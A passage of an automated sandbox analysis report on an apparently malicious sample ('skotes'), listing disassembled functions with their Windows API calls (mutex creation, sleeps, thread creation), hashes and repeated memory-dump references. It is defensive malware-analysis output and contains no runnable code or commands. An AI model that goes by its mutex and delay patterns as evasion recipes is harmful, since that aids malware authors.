Instruction ID: 22b1b4a6b9944ee7d703e7898b6f289a80132d1f0c91e7075a49d3d1ea19b0e1
Opcode Fuzzy Hash: 6741e600c7e953ae62f6edb72191e5b54eaf453aba9f361c85e3dbb9363da6ff
Instruction Fuzzy Hash: 5B310531704104EBFB18DB78DD8AB6DB772EBC2314F248219E094AB2D3D73D99808662

Function 0073A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A7BA
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: a07ca80237471b0824858453694072e4c7e95348e46d02d93819d77a83768471
Instruction ID: 2d179d5d92259c1d4d6841067f5caacc4a3773645a6cbcb1c73b8277981ec9dd
Opcode Fuzzy Hash: a07ca80237471b0824858453694072e4c7e95348e46d02d93819d77a83768471
Instruction Fuzzy Hash: 64312A31744104EBFB19DB78DD8ABADB772EBC1314F248219E094A72D3D73D99818722

Function 0073A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 262e2fb1732fdb53d8fa434d8e82bd18d0c60473c2eddd56697d7e1e34ef3457
Instruction ID: a26be2b9c88dbaf7b8e21eebb281aaea625955d723862c84b3470c3e7c3438cb
Opcode Fuzzy Hash: 262e2fb1732fdb53d8fa434d8e82bd18d0c60473c2eddd56697d7e1e34ef3457
Instruction Fuzzy Hash: 63E0CD3039D300A7FB117368AC47B2E6299D7D6704F211636E744EB1D1C96CA5808137

Function 00737590 Relevance: 4.7, APIs: 3, Instructions: 158sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,3EB2933D,?,00000000,00779138,000000FF), ref: 007375CC
CreateThread.KERNEL32(00000000,00000000,00737430,00798638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 007376BF
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007376C9

Part of subcall function 0074D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0074D17B

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep$ConditionCreateThreadVariableWake
String ID:
API String ID: 79123409-0
Opcode ID: 6cc8835af8f345fb49bca4a6dd74d1701aa761dec33c08475bb7268715ae692f
Instruction ID: 5fb85e8ec4a153d9d11d0fd4e41fc87977ded41ac5b0ddee40a477137e1af610
Opcode Fuzzy Hash: 6cc8835af8f345fb49bca4a6dd74d1701aa761dec33c08475bb7268715ae692f
Instruction Fuzzy Hash: 5751D5B0200244DBEB68DF28DC89B9D3BA1EB46744F50861AF8159B3D3DB7D9881CB56

Function 00766E4C Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63911dbf5d85c66411bf50955f9bbb6fd05feeb6c5a31ae6d5cf9feb29aace0f
Instruction ID: 1a06edac19f7d14964435f9be5e0b66ff19782c1d677f96e9685ca4f1042f525
Opcode Fuzzy Hash: 63911dbf5d85c66411bf50955f9bbb6fd05feeb6c5a31ae6d5cf9feb29aace0f
Instruction Fuzzy Hash: 9021F872905208BBEB116BA8DC46BAF3769EF42378F140351FD262B1D1D778AE0586A1

Function 00746D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00746D10
Sleep.KERNEL32(00007530), ref: 00746D25

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 5396a7b9861193a20e429ebeeaf34afab4c6661109944dfa4778e3fea1bd9248
Instruction ID: 90208c621cf4578dea502890fc7dc753b87c374f4f9bbcae84c9c24432f357e4
Opcode Fuzzy Hash: 5396a7b9861193a20e429ebeeaf34afab4c6661109944dfa4778e3fea1bd9248
Instruction Fuzzy Hash: D7D04C75BC9314B6F56017A06C0BF66AA119B0BF52F355444B74C3F0D487E835004BAF

Function 00738380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00738524

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
